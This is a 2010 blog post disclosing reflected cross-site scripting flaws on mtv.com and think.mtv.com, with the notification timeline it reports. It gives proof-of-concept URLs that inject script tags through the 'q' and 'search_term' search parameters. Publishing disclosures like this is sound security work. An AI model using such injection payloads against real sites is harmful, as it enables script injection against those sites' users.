Sunday, June 20, 2010

MTV vulnerable to Cross Site Scripting (XSS)

+++About MTV+++
http://en.wikipedia.org/wiki/MTV


+++Affected URL(s)+++
http://www.mtv.com
http://think.mtv.com


+++Vulnerable Parameter / Function+++
'q'
'search_term'


+++PoC+++
MTV - http://www.mtv.com
http://www.mtv.com/search/?q=<script>alert('xss from search')</script>


Think.MTV - http://think.mtv.com

http://think.mtv.com/Search/TagResults.aspx?search_term=<script>alert('xss from search_term')</script>&filter_by=7&sort_order_type=1&category_ucid=44FDFFFF0002D79CFFFF00000069&time_stamp=








MTV Ist Notified: January 06, 2010
          IInd Notification: June 15, 2010
Response Received: None
Current Status: Vulnerable (As of today, June 20, 2010)


Best Regards.

No comments:

Post a Comment

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.